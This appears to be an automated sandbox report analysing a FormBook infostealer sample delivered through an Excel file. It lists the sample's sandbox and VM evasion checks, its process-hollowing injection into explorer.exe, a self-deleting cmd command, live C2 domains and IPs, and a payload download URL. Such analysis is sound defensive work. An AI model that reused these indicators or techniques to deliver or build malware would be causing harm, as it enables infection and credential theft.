Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3064, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 8_2_004088A0 rdtsc

8_2_004088A0

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2348	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2984	Thread sleep time: -103182s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3052	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2064	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 103182			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000009.00000002.2349753135.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.2162338388.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000009.00000000.2162381993.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000009.00000000.2162175955.00000000041AD000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000009.00000000.2154806307.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 8_2_004088A0 rdtsc

8_2_004088A0

Source: C:\Users\Public\vbc.exe

Code function: 8_2_00409B10 LdrLoadDll,

8_2_00409B10

Source: C:\Users\Public\vbc.exe	Code function: 8_2_009426F8 mov eax, dword ptr fs:[00000030h]		8_2_009426F8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A326F8 mov eax, dword ptr fs:[00000030h]		11_2_02A326F8

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 104.21.65.7 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 75.2.66.247 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 54.85.86.211 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.241.53.161 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.essentiallyourscandles.com
Source: C:\Windows\explorer.exe	Domain query: www.brunoecatarina.com
Source: C:\Windows\explorer.exe	Domain query: www.zmzcrossrt.xyz
Source: C:\Windows\explorer.exe	Domain query: www.hfjxhs.com
Source: C:\Windows\explorer.exe	Domain query: www.cyrilgraze.com
Source: C:\Windows\explorer.exe	Domain query: www.zgcbw.net

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread register set: target process: 1388	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: DA0000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: vbc.exe, 00000008.00000003.2203754103.0000000002730000.00000004.00000001.sdmp	Binary or memory string: Proxy DesktopProgmanSoftware\Microsoft\Windows\CurrentVersion\RunOnce
Source: explorer.exe, 00000009.00000002.2349949941.00000000006F0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.2350379071.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000008.00000003.2203754103.0000000002730000.00000004.00000001.sdmp, explorer.exe, 00000009.00000002.2349949941.00000000006F0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.2350379071.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.2349753135.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000002.2349949941.00000000006F0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.2350379071.0000000001080000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter1	Path Interception	Process Injection612	Masquerading111	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol122	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information41	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing2	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
APPROVED.xlsx	21%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
8.2.vbc.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://www.essentiallyourscandles.com/p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2P	0%	Avira URL Cloud	safe
http://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P	0%	Avira URL Cloud	safe
https://www.casar.com/assunto/noivas/dicas-para-noivas/	0%	Avira URL Cloud	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
https://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO	0%	Avira URL Cloud	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://3.36.53.50/dose/xele.exe	0%	Avira URL Cloud	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
https://www.casar.com/assunto/organizacao/	0%	Avira URL Cloud	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
https://www.casar.com	0%	Avira URL Cloud	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/	0%	Avira URL Cloud	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.brunoecatarina.com	54.85.86.211	true	true	unknown
www.myfavbutik.com	104.21.15.16	true	false	unknown
www.hfjxhs.com	156.241.53.161	true	true	unknown
www.cyrilgraze.com	104.21.65.7	true	true	unknown
shops.myshopify.com	23.227.38.74	true	true	unknown
ytptranspx.xshoppy.shop	75.2.66.247	true	true	unknown
www.zmzcrossrt.xyz	unknown	unknown	true	unknown
www.zgcbw.net	unknown	unknown	true	unknown
www.essentiallyourscandles.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.essentiallyourscandles.com/p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2P	true	Avira URL Cloud: safe	unknown
http://www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P	true	Avira URL Cloud: safe	unknown
http://3.36.53.50/dose/xele.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sogou.com/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://casarpontocom.zendesk.com/hc/pt-br	explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	false		high
https://www.casar.com/assunto/noivas/dicas-para-noivas/	explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://%s.com	explorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.2152979155.0000000002331000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	false		high
